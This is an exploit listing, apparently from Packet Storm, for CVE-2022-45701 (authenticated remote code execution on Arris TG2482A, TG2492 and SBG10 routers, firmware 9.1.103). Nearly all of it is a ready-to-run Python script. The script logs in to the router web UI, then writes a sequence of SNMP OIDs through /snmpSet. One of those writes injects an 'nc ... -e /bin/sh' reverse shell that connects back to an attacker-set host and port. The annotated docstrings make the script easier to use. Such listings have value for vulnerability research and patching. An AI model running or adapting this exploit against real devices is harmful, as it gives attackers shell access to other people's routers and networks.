
Arris Router Firmware 9.1.103 Remote Code Execution

2023-02-15 00:00:00
Yerodin Richards
packetstormsecurity.com
171
exploit
remote code execution
arris router
firmware 9.1.103
authenticated
cve-2022-45701
commscope
tg2482a
tg2492
sbg10
vulnerability
security flaw

EPSS score: 0.027 (Low), 90.5th percentile

# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://www.commscope.com/  
# Version: 9.1.103  
# Tested on: TG2482A, TG2492, SBG10  
# CVE : CVE-2022-45701  
  
import base64
import sys

import requests
  
# Target and credentials consumed by main(); edit these before running.
router_host = "http://192.168.0.1"  # base URL of the router web UI, no trailing slash
username = "admin"  # combined as base64("user:pass") by gen_header() and sent to /login
password = "password"

# Listener the injected reverse shell connects back to (see gen_payload()).
lhost = "192.168.0.6"
lport = 80
  
  
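def main():
    """Authenticate to the router, then push the reverse-shell payload.

    Reads the module-level settings (router_host, username, password,
    lhost, lport). An empty body from /login is treated as a failed
    login and the process exits with status -1; otherwise the returned
    credential is reused for every /snmpSet write in send_payload().
    """
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        # sys.exit rather than the site-provided exit() builtin, which is
        # meant for the interactive prompt and is absent under `python -S`.
        sys.exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")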
  
def gen_header(u, p):
    """Return base64("u:p") as text.

    Despite the name this is not sent as an HTTP header: get_cookie()
    places it in the ``arg`` query parameter of GET /login. Both values
    must be ASCII; anything else raises UnicodeEncodeError.
    """
    raw = bytes(f"{u}:{p}", "ascii")
    return base64.b64encode(raw).decode("ascii")
  
def no_encode_params(params):
    """Serialize ``params`` as ``k=v&k2=v2`` with no percent-encoding.

    Used instead of handing requests a dict so that characters the router
    must receive verbatim (``$``, ``(``, ``)``, ``;``, ``%20``) are not
    escaped. Values are rendered with str(); an empty mapping yields "".
    """
    pairs = [f"{key}={value}" for key, value in params.items()]
    return "&".join(pairs)
  
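def get_cookie(header):
    """Log in and return the credential string the router hands back.

    ``header`` is the base64 "user:pass" blob from gen_header(); it is sent
    as the ``arg`` query parameter of GET /login. The raw response body is
    returned unchanged — main() treats an empty body as a failed login.
    Raises UnicodeDecodeError if the body is not valid UTF-8, and
    requests.Timeout if the target does not answer within 10 seconds.
    """
    url = router_host + "/login"
    # Pre-serialized string so requests appends it without percent-encoding.
    params = no_encode_params({"arg": header, "_n": 1})
    # A bounded wait: an unresponsive target should fail the run, not hang it.
    resp = requests.get(url, params=params, timeout=10)
    return resp.content.decode('UTF-8')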
  
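def set_oid(oid, cookie):
    """Issue one GET /snmpSet for ``oid`` using the ``credential`` cookie.

    ``oid`` is already in the ``<oid>=<value>;<n>;`` form send_payload()
    builds; it is placed in the query string via no_encode_params() so the
    injected characters reach the router unescaped. Returns the
    requests.Response so a caller can inspect the status (the exploit
    itself ignores it). Raises requests.Timeout after 10 seconds.
    """
    url = router_host + "/snmpSet"
    params = no_encode_params({"oid": oid, "_n": 1})
    cookies = {"credential": cookie}
    # Bounded wait so a stalled device does not block the remaining writes forever.
    return requests.get(url, params=params, cookies=cookies, timeout=10)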
  
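def gen_payload(h, p):
    r"""Build the command-injection value written to the router via /snmpSet.

    The result is ``$\(nc%20<h>%20<p>%20-e%20/bin/sh)`` — a shell command
    substitution that, if the device has a netcat supporting ``-e``, opens
    a reverse shell to ``h``:``p``. Spaces are written as %20 because the
    query string is deliberately not encoded (see no_encode_params()).

    The backslash before the parenthesis is a literal byte, exactly as the
    original produced it; the ``rf`` prefix keeps the bytes identical while
    avoiding the invalid-escape warning that ``"\("`` raises on Python 3.12+.
    NOTE(review): confirm whether the target's parser expects ``$(`` or
    ``$\(`` — the original exploit sends the latter.
    """
    return rf"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"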
  
def send_payload(payload, cookie):
    """Perform the sequence of /snmpSet writes that plants and triggers the command.

    Six leaves under the same enterprise subtree (1.3.6.1.4.1.4115.1.20.1.1.7)
    are written in a fixed order; ``payload`` goes into leaf .2.0 and the
    final write to .9.0 is presumably what makes the device act on it.
    NOTE(review): the ``;<n>;`` suffixes look like value-type codes for the
    endpoint, but their meaning is not visible here — verify against the
    device before changing any of them. Order is preserved exactly.
    """
    prefix = "1.3.6.1.4.1.4115.1.20.1.1.7."
    writes = [
        ("1.0", "16;2;"),
        ("2.0", f"{payload};4;"),
        ("3.0", "1;66;"),
        ("4.0", "64;66;"),
        ("5.0", "101;66;"),
        ("9.0", "1;2;"),
    ]
    for leaf, value in writes:
        set_oid(f"{prefix}{leaf}={value}", cookie)
  
  
if __name__ == "__main__":
    # Run the exploit only when executed directly, not when imported.
    main()
